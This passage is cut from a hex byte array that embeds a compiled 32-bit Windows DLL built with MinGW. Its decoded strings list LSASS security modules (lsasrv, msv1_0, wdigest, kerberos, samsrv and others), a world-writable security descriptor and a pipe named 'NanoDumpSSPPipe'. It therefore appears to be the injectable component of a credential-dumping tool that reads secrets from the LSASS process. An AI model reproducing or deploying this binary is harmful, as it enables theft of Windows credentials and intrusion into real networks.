5D,0xC3,0x8D,0x74,0x26,0x00,0x66,0x81,0xB8,0x18,0x00,0x88,0x6C,0x0B,0x01,0x75,0xEA,0x8B,0x80,0x80,0x00,0x88,0x6C,0x85,0xC0,0x74,0xE0,0x0F,0xB7,0x56,0x14,0x0F,0xB7,0x7E,0x06,0x8D,0x54,0x16,0x18,0x66,0x85,0xFF,0x74,0xCF,0x31,0xF6,0x8B,0x4A,0x0C,0x39,0xC8,0x72,0x07,0x03,0x4A,0x08,0x39,0xC8,0x72,0x1A,0x83,0xC6,0x01,0x83,0xC2,0x28,0x39,0xF7,0x75,0xE8,0x31,0xC9,0x5B,0x5E,0x89,0xC8,0x5F,0x5D,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x88,0x6C,0xEB,0x07,0x90,0x83,0xEB,0x01,0x83,0xC0,0x14,0x8B,0x48,0x04,0x85,0xC9,0x75,0x07,0x8B,0x50,0x0C,0x85,0xD2,0x74,0xD4,0x85,0xDB,0x7F,0xE8,0x8B,0x48,0x0C,0x5B,0x5E,0x5F,0x81,0xC1,0x00,0x00,0x88,0x6C,0x5D,0x89,0xC8,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xDB,0xE3,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x51,0x50,0x3D,0x00,0x10,0x00,0x00,0x8D,0x4C,0x24,0x0C,0x72,0x15,0x81,0xE9,0x00,0x10,0x00,0x00,0x83,0x09,0x00,0x2D,0x00,0x10,0x00,0x00,0x3D,0x00,0x10,0x00,0x00,0x77,0xEB,0x29,0xC1,0x83,0x09,0x00,0x58,0x59,0xC3,0x90,0x90,0x66,0x90,0x66,0x90,0xB8,0x01,0x00,0x00,0x00,0xC2,0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x31,0xC0,0x89,0xE5,0x8B,0x55,0x0C,0x8B,0x4D,0x08,0x85,0xD2,0x75,0x10,0xEB,0x17,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x83,0xC0,0x01,0x39,0xC2,0x74,0x09,0x66,0x83,0x3C,0x41,0x00,0x75,0xF2,0x89,0xC2,0x89,0xD0,0x5D,0xC3,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x8B,0x45,0x08,0x5D,0xC1,0xE0,0x05,0x03,0x05,0x3C,0xE1,0x88,0x6C,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x8B,0x45,0x08,0x85,0xC0,0x74,0x18,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0xC7,0x40,0x04,0x00,0x00,0x00,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x5D,0xC3,0xB8,0xFF,0xFF,0xFF,0xFF,0x5D,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x5D,0x08,0x85,0xDB,0x0F,0x84,0xAD,0x00,0x00,0x00,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x30,0x01,0x00,0x00,0x8B,0x03,0x85,0xC0,0x74,0x62,0x8B,0x53,0x04,0x8B,0x43,0x08,0x39,0xC2,0x74,0x28,0x8D,0x42,0x04,0x89,0x43,0x04,0x8B,0x45,0x0C,0x89,0x02,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x11,0x01,0x00,0x00,0x31,0xC0,0x83,0xC4,0x1C,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x03,0x89,0xD7,0x29,0xC7,0x89,0x04,0x24,0x89,0xFE,0xC1,0xFE,0x02,0xC1,0xE6,0x03,0x89,0x74,0x24,0x04,0xE8,0x36,0x01,0x00,0x00,0x85,0xC0,0x74,0x3F,0x89,0x03,0x8D,0x14,0x38,0x01,0xF0,0x89,0x43,0x08,0xEB,0xAE,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x04,0x00,0x00,0x00,0xC7,0x04,0x24,0x20,0x00,0x00,0x00,0xE8,0xCC,0x00,0x00,0x00,0x89,0x03,0x89,0xC2,0x85,0xC0,0x74,0x11,0x89,0x43,0x04,0x8D,0x80,0x80,0x00,0x00,0x00,0x89,0x43,0x08,0xE9,0x77,0xFF,0xFF,0xFF,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x97,0x00,0x00,0x00,0x83,0xC8,0xFF,0xEB,0x83,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x7D,0x08,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x68,0x00,0x00,0x00,0x8B,0x37,0x8B,0x5F,0x04,0xC7,0x47,0x08,0x00,0x00,0x00,0x00,0xC7,0x47,0x04,0x00,0x00,0x00,0x00,0xC7,0x07,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x4B,0x00,0x00,0x00,0x85,0xF6,0x74,0x1E,0x83,0xEB,0x04,0x39,0xF3,0x72,0x0F,0x8B,0x03,0x85,0xC0,0x74,0xF3,0xFF,0xD0,0x83,0xEB,0x04,0x39,0xF3,0x73,0xF1,0x89,0x34,0x24,0xE8,0x41,0x00,0x00,0x00,0x83,0xC4,0x1C,0x31,0xC0,0x5B,0x5E,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0x25,0x34,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x38,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x40,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x44,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x4C,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x50,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x54,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x58,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x5C,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x60,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x64,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x68,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x6C,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x70,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x74,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x78,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x7C,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x80,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x84,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x88,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x8C,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x94,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x98,0xE1,0x88,0x6C,0x90,0x90,0xFF,0x25,0x9C,0xE1,0x88,0x6C,0x90,0x90,0xE9,0x7B,0xA6,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0xFF,0xFF,0xFF,0x80,0x6D,0x88,0x6C,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x80,0x88,0x6C,0x7E,0x80,0x88,0x6C,0x94,0x80,0x88,0x6C,0xA8,0x80,0x88,0x6C,0xC0,0x80,0x88,0x6C,0xDA,0x80,0x88,0x6C,0xF2,0x80,0x88,0x6C,0x0C,0x81,0x88,0x6C,0x22,0x81,0x88,0x6C,0x3C,0x81,0x88,0x6C,0x50,0x81,0x88,0x6C,0x66,0x81,0x88,0x6C,0x7C,0x81,0x88,0x6C,0x92,0x81,0x88,0x6C,0xB0,0x81,0x88,0x6C,0xCA,0x81,0x88,0x6C,0xE2,0x81,0x88,0x6C,0xFA,0x81,0x88,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x6D,0x88,0x6C,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x02,0x00,0x00,0x00,0x30,0x6B,0x88,0x6C,0x50,0x6C,0x88,0x6C,0x80,0x6B,0x88,0x6C,0x50,0x6B,0x88,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x69,0x62,0x67,0x63,0x63,0x5F,0x73,0x5F,0x64,0x77,0x32,0x2D,0x31,0x2E,0x64,0x6C,0x6C,0x00,0x5F,0x5F,0x72,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x5F,0x66,0x72,0x61,0x6D,0x65,0x5F,0x69,0x6E,0x66,0x6F,0x00,0x5F,0x5F,0x64,0x65,0x72,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x5F,0x66,0x72,0x61,0x6D,0x65,0x5F,0x69,0x6E,0x66,0x6F,0x00,0x00,0x00,0x00,0x5C,0x00,0x3F,0x00,0x3F,0x00,0x5C,0x00,0x00,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x31,0x00,0x5F,0x00,0x30,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x73,0x00,0x70,0x00,0x6B,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x64,0x00,0x69,0x00,0x67,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x65,0x00,0x72,0x00,0x62,0x00,0x65,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x64,0x00,0x70,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x64,0x00,0x63,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x73,0x00,0x61,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x72,0x00,0x73,0x00,0x61,0x00,0x65,0x00,0x6E,0x00,0x68,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x70,0x00,0x72,0x00,0x6F,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x65,0x00,0x76,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x6C,0x00,0x6F,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x65,0x00,0x76,0x00,0x74,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x6C,0x00,0x6F,0x00,0x75,0x00,0x64,0x00,0x61,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x44,0x00,0x3A,0x00,0x28,0x00,0x41,0x00,0x3B,0x00,0x4F,0x00,0x49,0x00,0x43,0x00,0x49,0x00,0x3B,0x00,0x47,0x00,0x41,0x00,0x3B,0x00,0x3B,0x00,0x3B,0x00,0x57,0x00,0x44,0x00,0x29,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00,0x2E,0x00,0x5C,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00,0x5C,0x00,0x25,0x00,0x77,0x00,0x73,0x00,0x00,0x00,0x4E,0x00,0x61,0x00,0x6E,0x00,0x6F,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x53,0x00,0x53,0x00,0x50,0x00,0x50,0x00,0x69,0x00,0x70,0x00,0x65,0x00,0x00,0x00,0xC0,0x5E,0x88,0x6C,0x00,0x00,0x89,0x6C,0x04,0x00,0x89,0x6C,0x38,0xCA,0x88,0x6C,0x18,0xF0,0x88,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4D,0x69,0x6E,0x67,0x77,0x2D,0x77,0x36,0x34,0x20,0x72,0x75,0x6E,0x74,0x69,0x6D,0x65,0x20,0x66,0x61,0x69,0x6C,0x75,0x72,0x65,0x3A,0x0A,0x00,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x20,0x68,0x61,0x73,0x20,0x6E,0x6F,0x20,0x69,0x6D,0x61,0x67,0x65,0x2D,0x73,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x66,0x6F,0x72,0x20,0x25,0x64,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,0x20,0x61,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x00,0x00,0x00,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x63,0x6F,0x64,0x65,0x20,0x30,0x78,0x25,0x78,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x70,0x72,0x6F,0x74,0x6F,0x63,0x6F,0x6C,0x20,0x76,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x62,0x69,0x74,0x20,0x73,0x69,0x7A,0x65,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x25,0x64,0x20,0x62,0x69,0x74,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x61,0x74,0x20,0x25,0x70,0x20,0x6F,0x75,0x74,0x20,0x6F,0x66,0x20,0x72,0x61,0x6E,0x67,0x65,0x2C,0x20,0x74,0x61,0x72,0x67,0x65,0x74,0x69,0x6E,0x67,0x20,0x25,0x70,0x2C,0x20,0x79,0x69,0x65,0x6C,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x20,0x25,0x70,0x2E,0x0A,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x7A,0x52,0x00,0x01,0x7C,0x08,0x01,0x1B,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x1C,0x